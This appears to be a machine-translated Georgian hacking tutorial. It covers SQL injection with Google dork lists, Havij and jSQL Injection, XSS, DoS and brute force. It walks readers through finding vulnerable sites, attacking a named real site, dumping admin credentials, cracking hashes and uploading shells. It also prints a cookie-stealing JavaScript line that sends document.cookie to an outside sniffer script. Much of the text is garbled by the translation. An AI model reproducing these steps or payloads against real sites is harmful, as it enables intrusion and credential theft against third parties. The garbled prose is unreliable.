შეტევა შეიძლება განხორციელდეს PHP, ASP, Perl და სხვა ენებზე დაწერილი სკრიპტებით. ასეთი თავდასხმების წარმატება დამოკიდებულია იმაზე, თუ როგორ არის გამიზნული DBMS და როგორ განხორციელდება თავად სკრიპტი. მსოფლიოს უკვე აქვს უამრავი სხვადასხვა საიტი SQL ინექციებისთვის. ცომისთვის ადვილია გადახვევა. Dosit "Dorki"-ში შესასვლელად - ეს არის სპეციალური სასმელები სხვადასხვა საიტების მოსაძებნად. ღერძის მოქმედებები მათგან:

• inurl: index.php? id =
• inurl: trainers.php? id =
• inurl: buy.php? კატეგორია =
• inurl: article.php? ID=
• inurl: play_old.php? id =
• inurl: declaration_more.php? decl_id =
• inurl:pageid=
• inurl: games.php? id =
• inurl: page.php? ფაილი =
• inurl: newsDetail.php? id =
• inurl: gallery.php? id =
• inurl: article.php? id =

როგორ შეგიძლიათ მიიღოთ მათგან მოგება? შეიყვანეთ їх საძიებო სისტემაში Google ან Yandex. Poshukovik გაჩვენებთ არა მხოლოდ გამანაწილებელ ადგილს, არამედ ამ გამავრცელებელ საიტზე არსებულ მხარეს. ალე ჩვენ არ მოგერიდებათ და გადავიდეთ ისე, რომ ჩამოსხმის მხარე ეფექტური იყოს. ამის მისაღწევად, "id = 1" მნიშვნელობის შემდეგ, მოათავსეთ ერთი ჩანართი "'". Ამგვარად:

• inurl: games.php? id=1'

და საიტი მოგვცემს მცირე სიმშვიდეს SQL-ით გარეცხვის შესახებ. რა მისცეს მათ ჩვენს ჰაკერს?

შემდეგ კი მჭირდება ის გულმოწყალებით გვერდზე გაგზავნილი. შემდეგ დაღვრაზე მუშაობა უმეტეს შემთხვევაში ხელმისაწვდომია დისტრიბუციაში "Kali Linux" თავისი კომუნალური საშუალებებით ამ სფეროში: საშიში კოდის დანერგვა და საჭირო ოპერაციების შესრულება. ვერ გეტყვით, როგორ მოხვდებით იქ. ასევე შეგიძლიათ იპოვოთ ინფორმაცია ინტერნეტში.

XSS შეტევა

ამ ტიპის შეტევა გავლენას ახდენს ნამცხვრები. კორისტუვაჩებს ძალიან უყვართ მათი გადარჩენა გულში. Რატომაც არა? როგორ ვიცხოვროთ მათ გარეშე? Cookies-ითაც კი, Vk.com-ის ან Mail.ru-ს პაროლი ასჯერ არ უნდა შევიტანოთ. და ცოტანი არიან, ვინც შთაგონებულია მათგან. ინტერნეტში ჰაკერებისთვის ხშირად არსებობს წესი: საიმედოობის ფაქტორი პირდაპირპროპორციულია უსაფრთხოების ფაქტორთან.

XSS შეტევის განსახორციელებლად, ჩვენმა ჰაკერმა უნდა იცოდეს JavaScript. ერთი შეხედვით, ენა ძალიან მარტივი და იაფია, რადგან ის არ იძლევა კომპიუტერულ რესურსებზე წვდომის საშუალებას. ჰაკერს შეუძლია გამოიყენოს JavaScript მხოლოდ ბრაუზერში, მაგრამ ეს ყველაფერია. გთხოვთ შეიყვანოთ კოდი ვებ გვერდზე.

თავდასხმის პროცესზე დეტალურად არ ვისაუბრებ. გაგვაგებინე საფუძველი და აზრი, თუ როგორ უნდა იყოს ეს.

ჰაკერს შეუძლია დაამატოთ JS კოდი ზოგიერთ ფორუმში ან სტუმრების წიგნში:

სკრიპტი გადაგვიგზავნის ინფიცირებულ გვერდზე, სადაც ნაჩვენები იქნება კოდი: იქნება ეს სნაიფერი, მოწყობილობა თუ ექსპლოიტი, რომელიც სხვაგვარად მოიპარავს ჩვენს ქუქი-ფაილებს ქეშიდან.

რატომ თავად JavaScript? იმის გამო, რომ JavaScript კარგად მუშაობს ვებ მოთხოვნებთან და აქვს წვდომა ქუქი-ფაილებზე. თუ ჩვენი სკრიპტი გადაგვაქვს რაიმე სახის საიტზე, მაშინ მისი მონიშვნა ადვილია. აქ ჰაკერი უფრო მზაკვრულ ვარიანტს გამოთქვამს - ის უბრალოდ სურათში შეაქვს კოდს.

Img = ახალი სურათი();

Img.src = "http://192.168.1.7/sniff.php?"+document.cookie;

ჩვენ უბრალოდ ვქმნით სურათებს და ვაძლევთ მათ ჩვენი სკრიპტის მისამართით.

როგორ დავიცვათ თავი ამისგან? ეს ძალიან მარტივია - ნუ მიჰყვებით საეჭვო შეტყობინებებს.

DoS და DDos შეტევები

DoS (ინგლისური: Denial of Service) - vidmova in service) - ჰაკერული შეტევა გამოთვლით სისტემაზე მისი vidmova-ზე მიტანის მიზნით. ასეთი გონების ღირებულება, რომელშიც რთული სისტემები ვერ უარყოფენ ზეწოლაზე წვდომას სისტემის რესურსები(სერვერები), ან წვდომა გამარტივებულია. ვირტუალური სისტემა შეიძლება ინახებოდეს მანამ, სანამ არ დაიმარხება, რადგან საგანგებო სიტუაციაში მას შეუძლია ნახოს ნებისმიერი კრიტიკული ინფორმაცია: მაგალითად, ვერსია, ნაწილი პროგრამის კოდიტა ინ. მაგრამ ყველაზე ხშირად ეკონომიკური ზეწოლის სამყაროში: უბრალო სერვისის ფლანგვა, რომელიც შემოსავალს ქმნის. პროვაიდერთან შემოწმება ან შეტევიდან გასასვლელში წვდომა "მეტა" ხელმისაწვდომი იქნება. ამ დროისთვის, DoS და DDoS შეტევები ყველაზე პოპულარულია, რადგან ისინი საშუალებას გაძლევთ ამოიღოთ თითქმის ნებისმიერი სისტემა ზედაპირზე იურიდიულად მნიშვნელოვანი მტკიცებულებების ჩამორთმევის გარეშე.

რა არის DoS-ის განმარტება, როგორც DDos შეტევა?

ეს DoS შეტევა განხორციელდა გონივრული გზით. მაგალითად, თუ სერვერი არ ამოწმებს შეყვანის პაკეტების სისწორეს, მაშინ ჰაკერს შეუძლია შექმნას მოთხოვნა, რომელიც სამუდამოდ დამუშავდება და არ დაკარგავს CPU-ს დროს სხვა მეთოდებთან მუშაობაზე. ცხადია, კლიენტები უარს ამბობენ ვიდმოვას სერვისში. ალე, რომ ხელახლა განვასხვავოთ ან ჰარმონიულად აჩვენოთ ამ გზით, დიდი ხილული ადგილები არ ჩანს. ისინი აღჭურვილია ფართო არხებით და მძიმე სერვერებით, რომლებიც ადვილად უმკლავდებიან ასეთ გადატვირთვას.

DDoS არის იგივე შეტევა, როგორც DoS. თუ მხოლოდ ერთი პაკეტი იგზავნება DoS-ში, მაშინ DDoS-ში შეიძლება იყოს ასობით ან მეტი მათგანი. ზოგიერთმა ძველმა სერვერმა შეიძლება არ უპასუხოს ასეთ ცვლილებებს. კონდახს მივუთითებ.

DoS შეტევა - როგორც კი როზმოვს მწყობრიდან გამოუყვანთ, მაშინ ვიღაც უცნობი ადამიანი მოდის და ხმამაღლა ყვირილს იწყებს. ვინმეს წინაშე საუბარი ან შეუძლებელია, ან კიდევ უფრო რთული. გადაწყვეტილება: გამოიძახეთ დაცვა დამშვიდებისთვის და ხალხის გაყვანა შენობიდან. DDoS თავდასხმები - როდესაც თავს ესხმიან უცნობ ადამიანებს, ათასობით ადამიანს თავს დაესხნენ. ასეთ ვითარებაში დაცვა ვერ შეძლებს ყველას დამრგვალებას და წაყვანას.

DoS და DDoS ამოფრქვევა კომპიუტერებიდან, ე.წ. ამ ჰაკერებმა დაარღვიეს ბიზნესის მფლობელების კომპიუტერები, რომლებსაც არ აქვთ ეჭვი, რომ მათი აპარატი მონაწილეობს შეტევაში რომელიმე სერვერზე.

როგორ დავიცვა თავი ამისგან? ზოგადად, არავითარ შემთხვევაში. თქვენ ასევე შეგიძლიათ გაუადვილოთ საქმე ჰაკერს. ვისთვისაც აუცილებელია შერჩევა კარგი ჰოსტინგიშრომისმოყვარე სერვერებით.

Bruteforce შეტევა

დეველოპერს შეუძლია შექმნას მრავალი სისტემა თავდასხმებისგან დასაცავად, გადახედოს ჩვენს მიერ დაწერილ სკრიპტებს, შეამოწმოს საიტი დაღვრაზე და ა.შ. თუ თქვენ მიხვალთ საიტის დანარჩენ განლაგებამდე და თუ უბრალოდ დააყენეთ პაროლი ადმინისტრატორის პანელისთვის, შეგიძლიათ დაივიწყოთ ერთი სიტყვა. პაროლი!

კატეგორიულად არ არის რეკომენდებული მარტივი პაროლის დაყენება. ეს შეიძლება იყოს 12345, 1114457, vasya111 და ა.შ. არ არის რეკომენდებული 10-11 სიმბოლოზე ნაკლები პაროლების დაყენება. წინააღმდეგ შემთხვევაში, შეგიძლიათ დაემორჩილოთ ძალიან მარტივ და რთულ შეტევას - უხეში ძალის.

Brute force არის პაროლის უხეში ძალის შეტევა Wikoristanny-ის ლექსიკონისთვის სპეციალური პროგრამები. ლექსიკონები შეიძლება იყოს განსხვავებული: ლათინური, დახარისხება რიცხვების მიხედვით, ვთქვათ ნებისმიერ დიაპაზონამდე, შერეული (ლათინური + რიცხვები) და შეიძლება იყოს ლექსიკონები უნიკალური სიმბოლოებით @ # 4 $% & * ~~ ` '" \? და სხვა.

ამ ტიპის თავდასხმის თავიდან აცილება მარტივია. ყველაფერი რაც თქვენ უნდა გააკეთოთ არის მარტივი პაროლის გამომუშავება. თქვენ შეიძლება მოგატყუოთ კაპჩამ. ასევე, თუ თქვენი საიტი აგებულია CMS-ზე, მაშინ ბევრი მათგანი აღმოაჩენს მსგავსი ტიპის შეტევას და დაბლოკავს IP-ს. თუ დაგჭირდებათ პაროლის მეტი განსხვავებული სიმბოლოების დამახსოვრება, მისი არჩევა უფრო მნიშვნელოვანია.

როგორ ვივარჯიშოთ „ჰაკერი“? უმეტეს შემთხვევაში, მათ ან აქვთ ეჭვი, ან იციან პაროლის ნაწილი. სრულიად ლოგიკურია ვივარაუდოთ, რომ koristuvach-ის პაროლი ნამდვილად არ შედგება 3 ან 5 სიმბოლოსგან. ასეთმა პაროლებმა შეიძლება გამოიწვიოს რაიმე ბოროტება. ძირითადად, ჰაკერები იღებენ 5-დან 10 სიმბოლომდე დიაპაზონს და ამატებენ რამდენიმე სიმბოლოს, რომელიც მათ შეუძლიათ შორიდან იცოდნენ. შემდეგი, შექმენით პაროლები საჭირო დიაპაზონებით. Kali Linux დისტრიბუციას აქვს პროგრამები ასეთი პრობლემებისთვის. და ვოილა, შეტევა დიდხანს აღარ იქნება ეფექტური, რადგან ლექსიკონის ცოდნა არც ისე დიდია. გარდა ამისა, ჰაკერს შეუძლია გავლენა მოახდინოს ვიდეო ბარათის სიძლიერეზე. ყველა მათგანი მხარს უჭერს CUDA სისტემას, რომელიც ზრდის ძიების სიჩქარეს 10-ჯერ. I axis mi bachimo, scho შეტევა ასე მარტივი გზითსრულიად რეალური. და არა მხოლოდ საიტებია მგრძნობიარე Bruteforce-ის მიმართ.

ძვირფასო მკითხველებო, არ დაივიწყოთ ინფორმაციული უსაფრთხოების სისტემა და დღეს ბევრი ადამიანი, მათ შორის ქვეყნები განიცდის მსგავსი ტიპის თავდასხმებს. და ყველაზე დაუცველი ადამიანებიც კი არიან, რომლებიც შეიძლება ან აქ გამოჩნდნენ, ან აქ არ გამოიხედონ. ჩვენ ვართ დაპროგრამებული, მაგრამ არა დაპროგრამებული მანქანები. მოემზადეთ იმ შემთხვევაში, თუ ინფორმაციის დაკარგვა სერიოზულ შედეგებს ემუქრება!

ასე რომ, ახლა მე გეტყვით მათზე, ვინც, რაიმე განსაკუთრებული ცოდნის გარეშე, უარესდება. მაშინვე ვიტყვი, რომ ამისგან ბევრი რამ არ არის მოსაპოვებელი, მაგრამ მაინც.
დასაწყებად, თქვენ უნდა იცოდეთ თავად საიტები. რატომ გადადით google.com-ზე და მოძებნეთ Dorken

Inurl: pageid = inurl: games.php? ID = inurl: page.php? ფაილი = inurl: newsDetail.php? Id = inurl: gallery.php? ID = inurl: article.php? ID = inurl: show.php? id = inurl: staff_id = inurl: newsitem.php? num = inurl: readnews.php? id = inurl: top10.php? კატა = inurl: historialeer.php? num = inurl: reagir.php? num = inurl: Stray-Questions-View.php? num = inurl: forum_bds.php? num = inurl: game.php? id = inurl: view_product.php? id = inurl: newsone.php? id = inurl: sw_comment.php? id = inurl: news.php? id = inurl: avd_start.php? avd = inurl: event.php? id = inurl: product-item.php? id = inurl: sql.php? id = inurl: news_view.php? id = inurl: select_biblio.php? id = inurl: humor.php? id = inurl: aboutbook.php? id = inurl: ogl_inet.php? ogl_id = inurl: fiche_spectacle.php? id = inurl: communique_detail.php? id = inurl: სემ. php3? id = inurl: kategorie.php4? id = inurl: news.php? id = inurl: index.php? id = inurl: faq2.php? id = inurl: show_an.php? id = inurl: preview.php? id = inurl: loadpsb.php? id = inurl: opinions.php? id = inurl: spr.php? id = inurl: pages.php? id = inurl: announce.php? id = inurl: clanek.php4? id = i nurl: participant.php? id = inurl: download.php? id = inurl: main.php? id = inurl: review.php? id = inurl: chappies.php? id = inurl: read.php? id = inurl: prod_detail.php? id = inurl: viewphoto.php? id = inurl: article.php? id = inurl: person.php? id = inurl: productinfo.php? id = inurl: showimg.php? id = inurl: ხედი. php? id = inurl: website.php? id = inurl: hosting_info.php? id = inurl: gallery.php? id = inurl: rub.php? idr = inurl: view_faq.php? id = inurl: artikelinfo.php? id = inurl: detail.php? ID = inurl: index.php? = inurl: profile_view.php? id = inurl: category.php? id = inurl: publications.php? id = inurl: fellows.php? id = inurl : downloads_info.php? id = inurl: prod_info.php? id = inurl: shop.php? do = ნაწილი & id = inurl: productinfo.php? id = inurl: collectionitem.php? id = inurl: band_info.php? id = inurl : product.php? id = inurl: releases.php? id = inurl: ray.php? id = inurl: product.php? id = inurl: pop.php? id = inurl: shopping.php? id = inurl: productdetail .php? id = inurl: post.php? id = inurl: viewshowdetail.php? id = inurl: clubpage.php? id = inurl: MemberInfo.php? id = inurl: section.php? id = url-ში: theme.php? id = inurl: page.php? id = inurl: shredder-categories.php? id = inurl: tradeCategory.php? id = inurl: product_ranges_view.php? ID = inurl: shop_category.php? id = inurl: transcript.php? id = inurl: channel_id = inurl: item_id = inurl: newsid = inurl: trainers.php? id = inurl: news-full.php? id = inurl: news_display.php? getid = inurl: index2. php? ვარიანტი = inurl: readnews.php? id = inurl: top10.php? კატა = inurl: newsone.php? id = inurl: event.php? id = inurl: product-item.php? id = inurl: sql. php? id = inurl: aboutbook.php? id = inurl: preview.php? id = inurl: loadpsb.php? id = inurl: pages.php? id = inurl: material.php? id = inurl: clanek.php4? id = inurl: announce.php? id = inurl: chappies.php? id = inurl: read.php? id = inurl: viewapp.php? id = inurl: viewphoto.php? id = inurl: rub.php? idr = inurl: galeri_info.php? l = inurl: review.php? id = inurl: iniziativa.php? in = inurl: curriculum.php? id = inurl: labels.php? id = inurl: story.php? id = inurl: look.php? ID = inurl: newsone.php? ID = inurl: aboutbook.php? ID = inurl: material.php? Id = inurl: opinions.php? Id = inurl: announce.php? ID = inurl: rub.php? Idr = inurl: galeri_info.php? l = inurl: text.php? idt = inurl: newscat.php? id = inurl: newsticker_info.php? idn = inurl: rubrika.php? idr = inurl: rubp.php? idr = inurl: offer.php? idf = inurl: art.php? idm = inurl: title.php? id = inurl: ".php? id = 1" inurl: ".php? cat = 1" inurl: ".php? catid = 1 "inurl:". php? num = 1 "inurl:". php? bid = 1 "inurl:". php? pid = 1 "inurl:". php? nid = 1 "

axis არის პატარა სია. შეგიძლიათ საკუთარის ვიკორიზირება. ასე რომ, ჩვენ ვიცით საიტი. მაგალითად http://www.vestitambov.ru/
შემდეგ გადმოვწერთ ამ პროგრამას

** დამალული კონტენტი: ამ ფარული შინაარსის სანახავად თქვენი პოსტების რაოდენობა უნდა იყოს 3 ან მეტი. **

დაბეჭდილი OK. შემდეგ ჩვენ ვსვამთ მსხვერპლის საიტს.
რელიეფური დასაწყისი. შემდეგ ჩვენ ვამოწმებთ შედეგებს.
ასე რომ, პროგრამამ იცოდა SQL ნაკადი.

შემდეგი ჩამოტვირთეთ Havij, http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= ჩასვით ორიგინალური შეტყობინება იქ. მე არ ავხსნი, როგორ გამოვიყენო Havij და სად გადმოვწერო, არ არის მნიშვნელოვანი მისი ცოდნა. Ის არის. თქვენ მიიღეთ თქვენთვის საჭირო მონაცემები - ადმინისტრატორის პაროლი, შემდეგ კი მარჯვნივ არის თქვენი ფანტაზია.

P.S. ეს ჩემი დაწერის პირველი მცდელობაა. კიდევ ერთხელ ვიკითხავ, თუ არ არის სწორი

გაუშვით იმპორტირებული ფაილი ორმაგი დაწკაპუნებით (თქვენ გჭირდებათ ვირტუალური ხელსაწყო ).

3. ანონიმურობა SQL-injection-ის გამოყენებით საიტზე დაბრუნებისას

Tor და Privoxy-ის დაყენება Kali Linux-ში

[რაზროდილ როზრობციში]

Windows-ზე Tor-ისა და Privoxy-ის დაყენება

[რაზროდილ როზრობციში]

რობოტების დაყენება მარიონეტების მეშვეობით jSQL Injection-ში

[რაზროდილ როზრობციში]

4. საიტის შემოწმება SQL-ინექციისთვის jSQL Injection-ით

პროგრამასთან მუშაობა ძალიან მარტივია. შეიყვანეთ ვებსაიტის მისამართი და დააჭირეთ ENTER.

შემდეგი სკრინშოტი აჩვენებს, რომ საიტი გთავაზობთ SQL ინექციების სამ ტიპს (მათ შესახებ ინფორმაცია მითითებულია ქვედა მარჯვენა კუთხეში). ინექციის სახელზე დაწკაპუნებით, შეგიძლიათ გადართოთ შერჩევის მეთოდი:

ასევე, ჩვენ უკვე ვნახეთ აშკარა მონაცემთა ბაზა.

კანის მაგიდის ნაცვლად შეგიძლიათ იხილოთ:

შეამოწმეთ ცხრილებში ნაპოვნი ადმინისტრატორის მონაცემები.

თუ დალოცეთ და გაიგეთ ადმინისტრატორის დეტალები, მაშინ ძალიან ადრეა გახარება. თქვენ ასევე უნდა იცოდეთ ადმინისტრატორის პანელი, სადაც უნდა შეიყვანოთ მონაცემები.

5. მოძებნეთ ადმინისტრატორი jSQL Injection-ისთვის

ამისათვის გადადით შემდეგ ჩანართზე. აქ ჩვენ გვაქვს შესაძლო მისამართების სია. თქვენ შეგიძლიათ აირჩიოთ ერთი ან მეტი გვერდი გადამოწმებისთვის:

უპირატესობა მდგომარეობს იმაში, რომ არ არის საჭირო სხვა პროგრამების ვიკორიზაცია.

სამწუხაროდ, არ არის ძალიან ბევრი დაუდევარი პროგრამისტი, რომლებიც ინახავენ პაროლებს აშკარად. Dosit ხშირად ზედიზედ პაროლები mi bachimo schos na kshtalt

8743b52063cd84097a65d1633f5c74f5

წე ჰაში. იოგოს გაშიფვრა შესაძლებელია უხეში ძალის გამოყენებით. ᲛᲔ... jSQL ინექციაშეიძლება ჩაერთოს უხეში ძალის გამოყენებით.

6. უხეში ძალის ჰეშები jSQL ინექციის გამოყენებით

აშკარა უპირატესობა ის არის, რომ თქვენ არ გჭირდებათ სხვა პროგრამების გამოყენება. აქცენტი კეთდება ყველაზე პოპულარული ჰეშების უპიროვნებაზე.

ეს არ არის საუკეთესო ვარიანტი. იმისათვის, რომ გახდეთ გურუ ჰეშების გაშიფვრაში, გირჩევთ რუსული წიგნი.

რა თქმა უნდა, თუ ხელთ არ გაქვთ სხვა პროგრამები და არ გაქვთ ერთი საათი სწავლისთვის, jSQL Injection დამატებული brute-force ფუნქციით არაფერი გამოვა.

ყოფნის პარამეტრები: შეგიძლიათ დააყენოთ რა სიმბოლოები შედის პაროლში, პაროლის დიაპაზონი.

7. ოპერაციები ფაილებთან SQL ინექციების გამოვლენის შემდეგ

მონაცემთა ბაზებთან ოპერაციების გარდა - მათი წაკითხვა და მოდიფიკაცია, როდესაც SQL ინექცია აღმოჩენილია და შეიძლება გამოიწვიოს ფაილების შემდგომი ოპერაციები:

• სერვერზე ფაილების კითხვა
• სერვერზე ახალი ფაილების ატვირთვა
• vivantazhennya Shell სერვერზე

და ყველაფერი დანერგილია jSQL Injection-ში!

Є exchange - SQL სერვერი პასუხისმგებელია ფაილის პრივილეგიებზე. გონიერთა შორის სისტემის ადმინისტრატორებიისინი დაკავშირებულია და აქვთ წვდომა ფაილების სისტემათქვენ ვერ შეძლებთ მისგან თავის დაღწევას.

ფაილის პრივილეგიების არსებობა უბრალოდ შეიძლება დადასტურდეს. გადადით ერთ-ერთ ჩანართზე (ფაილების წაკითხვა, გახსენით shell, ატვირთეთ ახალი ფაილი) და სცადეთ გააუქმოთ ერთ-ერთი მითითებული ოპერაცია.

კიდევ უფრო მნიშვნელოვანია პატივისცემა - ჩვენ უნდა ვიცოდეთ ზუსტი აბსოლუტური გზა იმ ფაილამდე, რომლითაც ვიმუშავებთ - წინააღმდეგ შემთხვევაში არაფერი გამოვა.

შეხედეთ შემდეგ ეკრანის სურათს:

როდესაც ჩვენ ვცდილობთ ოპერაციებს ფაილით, გვეუბნებიან: არ არის FILE პრივილეგია(ფაილის პრივილეგიები არ არის). და აქ არაფერი გესმის.

ვის ადგილას სხვა წყალობა გაქვს:

[directory_name]-ში ჩაწერის პრობლემა

ეს ნიშნავს, რომ თქვენ არასწორად მიუთითეთ აბსოლუტური გზა, რომელშიც უნდა დაიწეროს ფაილი.

იმისათვის, რომ აბსოლუტური გზა დაუშვას, აუცილებელია, მინიმუმ, ვიცოდეთ ოპერაციული სისტემარომელ სერვერზე მუშაობს? ამისათვის გადადით ქსელის ჩანართზე.

ასეთი ჩანაწერი (რიგი Win64) დავუშვათ, რომ ჩვენ შეგვიძლია პირდაპირ Windows OS-დან:

Keep-Alive: timeout = 5, max = 99 სერვერი: Apache / 2.4.17 (Win64) PHP / 7.0.0RC6 კავშირი: Keep-Alive მეთოდი: HTTP / 1.1 200 OK Content-Length: 353 თარიღი: პარ, 201 დეკ. 11:48:31 GMT X-Powered-By: PHP / 7.0.0RC6 Content-Type: text / html; სიმბოლოების ნაკრები = UTF-8

აქ გვაქვს რამდენიმე Unix-დან (* BSD, Linux):

გადაცემის დაშიფვრა: დაქუცმაცებული თარიღი: პარასკევი, 2015 წლის 11 დეკემბერი 11:57:02 GMT მეთოდი: HTTP / 1.1 200 OK Keep-Alive: დროის ამოწურვა = 3, მაქს = 100 დაკავშირება: შენარჩუნება-ცოცხალი კონტენტი-ტიპი: ტექსტი / html X- დამხმარე: PHP / 5.3.29 სერვერი: Apache / 2.2.31 (Unix)

და აქ გვაქვს CentOS:

მეთოდი: HTTP / 1.1 200 OK იწურება: ხუთ, 19 ნოემბერი +1981 8:52:00 GMT Set-cookie: PHPSESSID = 9p60gtunrv7g41iurr814h9rd0; გზა = / დაკავშირება: keep-alive X-Cache-Lookup: MISS t1.hoster.ru:6666 სერვერი: Apache / 2.2.15 (CentOS) X-Powered-By: PHP / 5.4.37 X-Cache: MISS-დან t1.hoster.ru Cache-Control: არ არის მაღაზია, არ არის ქეში, ხელახალი შემოწმება, შემდგომი შემოწმება = 0, წინასწარი შემოწმება = 0 პრაგმა: ქეშის გარეშე თარიღი: პარასკე, 11 დეკემბერი 2015 12:08:54 GMT გადაცემის კოდირება: ნატეხი Content-Type: text/html; სიმბოლოების ნაკრები = WINDOWS-1251

Windows-ზე ვებსაიტების სტანდარტული თემაა C:\Server\data\htdocs\. მაგრამ, სიმართლე ისაა, რომ თუ თქვენ "იფიქრეთ" სერვერის გაშვებაზე Windows-ზე, მაშინ, სავარაუდოდ, ეს ადამიანი არაფერს გრძნობს პრივილეგიების შესახებ. ასე რომ, დაიწყეთ varto-ს ცდა პირდაპირ C:/Windows/ დირექტორიადან:

ბაჩიმოს მსგავსად, პირველად ყველაფერი სასწაულად ჩაიარა.

მაგრამ თავად jSQL Injection ჭურვიდან მე მაქვს ეჭვი. ვინაიდან არსებობს ფაილის პრივილეგიები, თქვენ შეგიძლიათ ჩამოტვირთოთ ყველაფერი ვებ ინტერფეისიდან.

8. საიტების მასიური გადამოწმება SQL-ინექციების გამოყენებით

ეს არის jSQL ინექციის ფუნქცია. ყველაფერი ძალიან მარტივია - აირჩიეთ საიტების სია (შეგიძლიათ იმპორტი ფაილიდან), შეარჩიეთ ის, ვისი შემოწმებაც გსურთ და დააჭირეთ შესაბამის ღილაკს ოპერაციის დასაწყებად.

jSQL Injection-ის შესავალი

jSQL Injection არის კარგი, სასარგებლო ინსტრუმენტი SQL საინექციო საიტებზე ნაპოვნი ცოდნის მოსაძებნად და შემდგომ მოსაძიებლად. მისი უდავო უპირატესობები: გამოყენების სიმარტივე, დამატებითი ფუნქციების განხორციელება. jSQL Injection შეიძლება იყოს დამწყებთათვის საუკეთესო მეგობარი ვებსაიტების გაანალიზებისას.

მოკლე დროში აღვნიშნავდი მონაცემთა ბაზების რედაქტირების შეუძლებლობას (მე არ ვიცი ეს ფუნქცია). როგორც ყველა ინსტრუმენტს გრაფიკული ინტერფეისით, ზოგიერთ პროგრამას შეიძლება მივაწეროთ სკრიპტების გამოყენების უუნარობა. ამ პროგრამაში შესაძლებელია ავტომატიზაციიდან გაგრძელება - საიტების მასობრივი შემოწმების ფუნქციის განხორციელებით.

jSQL Injection პროგრამა ბევრად უფრო ადვილი გამოსაყენებელია, ვიდრე sqlmap. ასევე, sqlmap მხარს უჭერს SQL ინექციების უფრო მეტ ტიპს, აქვს ფაილების ბუხართან მუშაობის ვარიანტები და მრავალი სხვა ფუნქცია.

რჩევა: jSQL Injection არის ჰაკერების საუკეთესო მეგობარი.

თქვენ შეგიძლიათ იპოვოთ ინფორმაცია ამ პროგრამის შესახებ Kali Linux ენციკლოპედიაში ამ გვერდზე: http://kali.tools/?p=706